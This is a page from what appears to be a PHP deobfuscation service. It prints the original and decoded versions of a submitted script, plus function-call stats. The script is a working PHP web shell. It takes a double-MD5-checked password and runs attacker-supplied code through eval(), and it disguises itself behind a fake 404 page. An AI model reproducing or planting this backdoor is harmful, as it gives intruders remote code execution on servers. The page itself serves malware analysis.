Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php @set_time_limit(0); @error_reporting(NULL); @ini_set('display_errors',0); @ignor..

Decoded Output download

<?php 
@set_time_limit(0); 
@error_reporting(NULL); 
@ini_set('display_errors',0); 
@ignore_user_abort(TRUE); 
 
if(md5(md5($_REQUEST['psbt']))=='dffcf3afde83f9ab864e2678cbfcbd79' and $_REQUEST['mjdu']!=NULL) 
{ 
	$_REQUEST['mjdu']=str_replace('\"','"',$_REQUEST['mjdu']); 
	$_REQUEST['mjdu']=str_replace("\'","'",$_REQUEST['mjdu']); 
	eval($_REQUEST['mjdu']); 
	die(); 
	exit(); 
} 
else 
{ 
	echo '<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL '.$_SERVER['PHP_SELF'].' was not found on this server </p><p>Additionally, a 404 Not Found error was encountered while trying to use an Error Document to handle the request</p></body ></html >';die();exit(); 
} 
?>

Did this file decode correctly?

Original Code

<?php
@set_time_limit(0);
@error_reporting(NULL);
@ini_set('display_errors',0);
@ignore_user_abort(TRUE);

if(md5(md5($_REQUEST['psbt']))=='dffcf3afde83f9ab864e2678cbfcbd79' and $_REQUEST['mjdu']!=NULL)
{
	$_REQUEST['mjdu']=str_replace('\\"','"',$_REQUEST['mjdu']);
	$_REQUEST['mjdu']=str_replace("\\'","'",$_REQUEST['mjdu']);
	eval($_REQUEST['mjdu']);
	die();
	exit();
}
else
{
	echo '<!DOCTYPE HTML PUBLIC\"-//IETF//DTDHTML 2.0//EN\"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL '.$_SERVER['PHP_SELF'].' was not found on this server </p><p>Additionally, a 404 Not Found error was encountered while trying to use an Error Document to handle the request</p></body ></html >';die();exit();
}
?>

Function Calls

ini_set 1
set_time_limit 1
error_reporting 1

Variables

None

Stats

MD5 058238f4f6b2506a449afaec387973c2
Eval Count 0
Decode Time 69 ms